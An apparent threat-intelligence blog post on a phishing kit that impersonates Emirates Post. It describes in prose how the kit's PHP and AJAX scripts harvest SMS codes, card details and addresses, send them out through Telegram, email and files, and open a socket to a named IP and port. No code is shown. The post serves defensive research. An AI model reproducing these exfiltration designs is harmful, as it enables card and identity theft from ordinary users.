“In the digital realm, not everything that glitters is gold.” Cybercriminals regularly utilize brands to set up devious traps that are precisely targeted at unwary victims. One example of this is the Emirates Post phishing kit, a well-designed and particularly sophisticated campaign that tricks customers into divulging private and financial information.
Attackers use sophisticated equipment and redundant data exfiltration tactics to maximize their success while also making most people believe with their imitation of the official Emirates Post Group website.
Anatomy of the KIT
Finding
The Bolster researchers discovered a phishing kit on the CheckPhish platform that impersonated Emirates Post Group, the official postal operator for UAE [United Arab Emirates] with a revenue of around $37.4 billion USD.
Analysis of phishing kit
Exfiltration of Data
By altering the PHP script below, any attacker can add their email address, token, and chat ID in order to retrieve information from the Telegram channel. Sensitive user data is gathered using the script, especially SMS-based authentication codes. It obtains the IP address of the victim and the SMS address that the user input using a POST request. The script produces a link to a GeoIP lookup to determine the user’s location and logs the victim’s browser details. Information is sent to the attacker via a variety of routes, including telegrams, text files, and emails. This redundancy increases an attacker’s chances of collecting data successfully.
Exfiltration of Data
The PHP script in the below image is designed to collect and exfiltrate sensitive financial data, including credit card information (card number, name, expiration date, CVV)
Exfiltration of Data
The PHP script provided below collects and exfiltrates personal information, including the victim’s address, city and phone number.
Exfiltration of Data
The script attempts to establish a socket connection to remote IP (93.123.39.81) on port 4949, potentially for further exfiltration or control.
Attempt Socket Connection
Saved Sample Exfiltrated Data
AJAX-Powered Data Exfiltration
The jq.js.télécharger file obtained from jQuery is an integral part of the phishing kit’s functionality, providing advanced connectivity and data extraction capabilities. It uses AJAX ($.post, $.ajax) to capture and send sensitive data such as SMS codes and credit card information to attackers. This script allows the phishing kit to steal and leak user data while maintaining a similar level of legitimate functionality, ensuring maximum success.
MITRE ATT$CK
Understanding the tactics and techniques is critical for creating strong security measures and preventing potential threats,. The Mitre TTP, after analysis of the webpage and phishing kit, is given below:
MITRE ATT$CK Navigator
Profiling
IOC’s
Mitigation
Conclusion
The Emirates Post phishing kit highlights the increasing prevalence of cyberattacks that capture trust and awareness. The ability to impersonate legitimate businesses and use advanced filtering techniques poses significant risks to users and organizations. Proactive investigation and vigilant monitoring are critical for detecting and limiting the efforts of individuals behind sophisticated phishing campaigns, especially when new methods of attack arise. Our analysis emphasizes the significance of maintaining ongoing monitoring and developing forward-thinking measures to combat these dangers.